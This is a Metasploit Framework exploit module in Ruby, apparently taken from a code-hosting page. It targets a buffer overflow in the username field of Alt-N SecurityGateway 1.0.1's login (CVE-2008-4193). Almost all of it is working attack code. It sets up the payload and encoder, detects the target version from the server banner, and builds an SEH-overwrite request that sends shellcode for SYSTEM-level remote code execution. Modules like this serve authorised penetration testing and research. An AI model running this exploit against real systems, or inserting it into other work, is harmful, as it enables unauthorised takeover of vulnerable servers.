132 lines
3.5 KiB
Ruby
132 lines
3.5 KiB
Ruby
|
##
|
||
|
# $Id$
|
||
|
##
|
||
|
|
||
|
##
|
||
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
# Framework web site for more information on licensing and terms of use.
|
||
|
# http://metasploit.com/framework/
|
||
|
##
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
class Metasploit3 < Msf::Exploit::Remote
|
||
|
Rank = AverageRanking
|
||
|
|
||
|
include Msf::Exploit::Remote::HttpClient
|
||
|
include Msf::Exploit::Seh
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'Alt-N SecurityGateway username Buffer Overflow',
|
||
|
'Description' => %q{
|
||
|
Alt-N SecurityGateway is prone to a buffer overflow condition. This
|
||
|
is due to insufficient bounds checking on the "username"
|
||
|
parameter. Successful exploitation could result in code
|
||
|
execution with SYSTEM level privileges.
|
||
|
|
||
|
NOTE: This service doesn't restart, you'll only get one shot. However,
|
||
|
it often survives a successful exploitation attempt.
|
||
|
},
|
||
|
'Author' => [ 'jduck' ],
|
||
|
'License' => MSF_LICENSE,
|
||
|
'Version' => '$Revision$',
|
||
|
'References' =>
|
||
|
[
|
||
|
[ 'CVE', '2008-4193' ],
|
||
|
[ 'OSVDB', '45854' ],
|
||
|
[ 'BID', '29457']
|
||
|
],
|
||
|
'Privileged' => true,
|
||
|
'DefaultOptions' =>
|
||
|
{
|
||
|
'EXITFUNC' => 'thread',
|
||
|
},
|
||
|
'Payload' =>
|
||
|
{
|
||
|
'Space' => 476,
|
||
|
# note: 0xd7 might not be translated, but w/e
|
||
|
'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),
|
||
|
'StackAdjustment' => -3500,
|
||
|
'EncoderType' => Msf::Encoder::Type::SingleStaticBit,
|
||
|
'EncoderOptions' =>
|
||
|
{
|
||
|
'BitNumber' => 0x5,
|
||
|
'BitValue' => true,
|
||
|
}
|
||
|
},
|
||
|
'Platform' => 'win',
|
||
|
'Targets' =>
|
||
|
[
|
||
|
[ 'Automatic Targeting', { } ],
|
||
|
# NOTE: the return address must be tolower() safe
|
||
|
[ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.0
|
||
|
],
|
||
|
'DefaultTarget' => 0,
|
||
|
'DisclosureDate' => 'Jun 02 2008'))
|
||
|
|
||
|
register_options([Opt::RPORT(4000)], self.class)
|
||
|
end
|
||
|
|
||
|
|
||
|
# Identify the target based on the SecurityGateway version number
|
||
|
def auto_target
|
||
|
print_status("Attempting to automatically selct a target...")
|
||
|
res = send_request_raw(
|
||
|
{
|
||
|
'uri' => '/SecurityGateway.dll'
|
||
|
}, 10)
|
||
|
|
||
|
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
|
||
|
case $1
|
||
|
when /1\.0\.1/
|
||
|
return self.targets[1]
|
||
|
end
|
||
|
end
|
||
|
|
||
|
# Not vulnerable
|
||
|
return nil
|
||
|
end
|
||
|
|
||
|
|
||
|
def exploit
|
||
|
|
||
|
# handle auto-targeting
|
||
|
mytarget = target
|
||
|
if target.name =~ /Automatic/
|
||
|
|
||
|
mytarget = auto_target
|
||
|
if mytarget.nil?
|
||
|
raise RuntimeError, "Unable to automatically select a target"
|
||
|
end
|
||
|
print_status("Automatically selected target \"#{mytarget.name}\"")
|
||
|
end
|
||
|
|
||
|
# the buffer gets CharLowerBuff()'d and passed to:
|
||
|
# sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);
|
||
|
|
||
|
sploit = payload.encoded
|
||
|
sploit << generate_seh_record(mytarget.ret)
|
||
|
distance = payload_space + 8
|
||
|
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
||
|
sploit = Rex::Text.to_hex(sploit, '%')
|
||
|
sploit << rand_text_alphanumeric(512)
|
||
|
|
||
|
post_data = 'RequestedPage=login'
|
||
|
post_data << '&username=' << sploit
|
||
|
post_data << '&passwd=world'
|
||
|
|
||
|
print_status("Sending request...")
|
||
|
res = send_request_cgi({
|
||
|
'uri' => '/SecurityGateway.dll',
|
||
|
'method' => 'POST',
|
||
|
'content-type' => 'application/x-www-form-urlencoded',
|
||
|
'data' => post_data,
|
||
|
}, 5)
|
||
|
|
||
|
handler
|
||
|
end
|
||
|
|
||
|
end
|